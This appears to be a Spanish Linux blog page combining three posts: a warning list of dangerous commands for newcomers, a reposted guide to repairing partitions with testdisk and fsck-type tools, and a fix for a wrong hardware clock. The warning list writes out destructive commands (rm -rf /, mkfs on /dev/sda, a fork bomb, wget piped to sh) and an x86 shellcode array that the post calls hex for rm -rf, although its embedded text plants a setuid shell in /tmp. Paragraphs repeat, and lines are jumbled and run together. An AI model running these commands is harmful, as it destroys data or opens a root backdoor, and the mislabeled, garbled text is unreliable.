Linux tampoco esta libre de usuarios malintencionados y si eres nuevo en este entorno no esta de mas que conozcas estas cosas. Existen comandos que no es recomendable ejecutar en nuestro sistema o evitar ejecutar si están contenidos dentro de shell scripts. Yo siempre digo que no hagáis Copy & Paste al tuntún de comandos, o si os bajáis algún script de un sitio que no conozcáis, lo editéis al menos antes y echéis un vistazo a su contenido para evitar luego males mayores. Algunos de estos comandos “peligrosos” son:
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
1. rm -rf /Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sdaFormatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){:|:&};:Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sdaSobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- | sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/nullMueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
Como reparar particiones y sistemas de archivo
Vía: Ubuntu Destiny
Platicando con un compañero de la Universidad, me preguntó que ¿Cómo puede reparar el sistema de archivos de un disco duro distinto a la instalación de Ubuntu, desde el mismo Ubuntu?, y la verdad es que hace ya algún tiempo en el foro de Ubuntu-es, había dejado un post de como poder hacerlo.
Aquí dejo la información:
He leído algunos post’s acerca de posibles errores y problemas en las particiones, y bueno, compré la revista Todo LINUX, Año 6, Número 70 y en la página 25 de la revista trae el siguiente artículo muy bueno sobre Reparar particiones y sistemas de archivos, lo pongo tal cual viene en la revista:
“… El reinicio involuntario de un equipo por un corte de luz o fallo físico puede provocar ocasionalmente la pérdida de la integridad de las particiones que utilicemos, y aunque los sistemas de archivos más modernos incluyen la recuperación y comprobación de la estructura de éstas, existen varias herramientas más completas para reparar particiones:
se muestra un listado con todos los discos duros disponibles junto a su tamaño, donde seleccionamos la que queramos verificar y presionamos “ENTER”. A continuación elegimos el tipo de partición que almacena según su arquitectura, estando disponibles Intel, Mac, Sun, Xbox y None.
En el nuevo listado seleccionamos una de las dos primeras opciones: Analyse para analizar la estructura del disco, donde se informa de los errores existentes y el método para corregirlos, y Advanced, que recupera sectores de arranque, estructuras de los sistemas de archivos y modifica el tipo de partición. El resto de las opciones permiten modificar la geometría del disco, Geometry; reescribir el sector de arranque, MBR Code, y eliminar todos los datos existentes en una partición, Delete.
En caso de no conocer el tipo de partición, podemos instalar disktype que ejecutando:
lo que nos muestra son las particiones existentes y su formato…”
Bueno, lo que me resta decir es que disktype se encuentra en los repositorios de Ubuntu, solo basta con hacer
Para poder instalarlo…
Me imagino que muchos intentaran utilizar ntfsfix para reparar alguna partición “Windows”, pero, de acuerdo a las palabras de Festor, moderador de Ubuntu-es:
Aquí dejo la información:
He leído algunos post’s acerca de posibles errores y problemas en las particiones, y bueno, compré la revista Todo LINUX, Año 6, Número 70 y en la página 25 de la revista trae el siguiente artículo muy bueno sobre Reparar particiones y sistemas de archivos, lo pongo tal cual viene en la revista:
“… El reinicio involuntario de un equipo por un corte de luz o fallo físico puede provocar ocasionalmente la pérdida de la integridad de las particiones que utilicemos, y aunque los sistemas de archivos más modernos incluyen la recuperación y comprobación de la estructura de éstas, existen varias herramientas más completas para reparar particiones:
- testdisk: Comprueba y repara particiones de Linux, BSD y Windows, incluyendo NTFS y OS/2.
$ testdiskEn el nuevo listado seleccionamos una de las dos primeras opciones: Analyse para analizar la estructura del disco, donde se informa de los errores existentes y el método para corregirlos, y Advanced, que recupera sectores de arranque, estructuras de los sistemas de archivos y modifica el tipo de partición. El resto de las opciones permiten modificar la geometría del disco, Geometry; reescribir el sector de arranque, MBR Code, y eliminar todos los datos existentes en una partición, Delete.
- Herramientas Individuales: Adicionalmente al testdisk, están disponibles un conjunto de herramientas centradas en la reparación de cada uno de los tipos de particiones disponibles: e2fsprogs, jfsutils, reiserprogs, xtfprogs y ntfsprogs.
$ e2fsck -p /dev/unidad$ reiserfsck –check /dev/unidad$ xfs_repair /dev/unidad$ jfs_fsck -f /dev/unidad$ ntfsfix /dev/unidad$ disktype /dev/unidadBueno, lo que me resta decir es que disktype se encuentra en los repositorios de Ubuntu, solo basta con hacer
$ sudo apt-get install disktypeMe imagino que muchos intentaran utilizar ntfsfix para reparar alguna partición “Windows”, pero, de acuerdo a las palabras de Festor, moderador de Ubuntu-es:
Decir que el ntfsfix no es un un reparador de particiones NTFS. Según su manual: “ntfsfix is a utility that fixes some common NTFS problems” ntfsfix es una utilidad que arregla algunos problemas comunes en particiones NTFS.
Vía: La bola de cristal
Otro de los pequeños inconvenientes con esta nueva instalación era que no se mostraba la hora del reloj del escritorio correctamente. Marcaba como unas tres horas más, si ponía el reloj en su hora correcta con el siguiente reinicio volvía a descolocarse. Comprobé la zona horaria y todo era correcto, la cosa me empezaba a mosquear. Además durante el arranque ya me lo marcaba con un asterisco en rojo avisándome.
La vez anterior ya me había pasado pero haciendo un:
date - -set “Año-Mes-Día Hora:Minutos”Leí que podía ser porque la hora de la bios no estaba correcta y por eso al reinicio se descolocaba y desde el terminal con el comando:
hwclock - -set - -date=”Año-Mes-Día Hora:Minutos”La ejecución de select() a /dev/rtc para esperar una señal de reloj expiró.
Lenta que soy a veces en reflejos sabiendo esto hasta el momento no se me había ocurrido mirar la hora que ponía en la bios, y efectivamente al entrar vi que marcaba esas mismas 3 horas más que marcaba mi reloj de escritorio… en este caso la solución fue muy sencilla, ajustarla a la hora real y al entrar en el escritorio ya salía correcta, parece que problema solucionado, pero a medias, porque en el arranque seguía apareciéndome el asterisco en rojo con el mismo aviso, pero esta vez no eran tres horas más, si no una…
Nuevamente y analizando lo del mensaje de error por el buscador de internet llegué a la solución, añadir a la lista negra rtc.
Tal como expliqué en un par de posts anteriores, esto se puede hacer editando
/etc/modprobe.d/blacklist.Y ahora sí, si pruebo:
hwclock - -set - -date=”Año-Mes-Día Hora:Minutos” ya funciona y compruebo con hwclock.(Todavía no me he leído con calma lo del ntp para saber como funciona realmente y como configurarlo).






No hay comentarios:
Publicar un comentario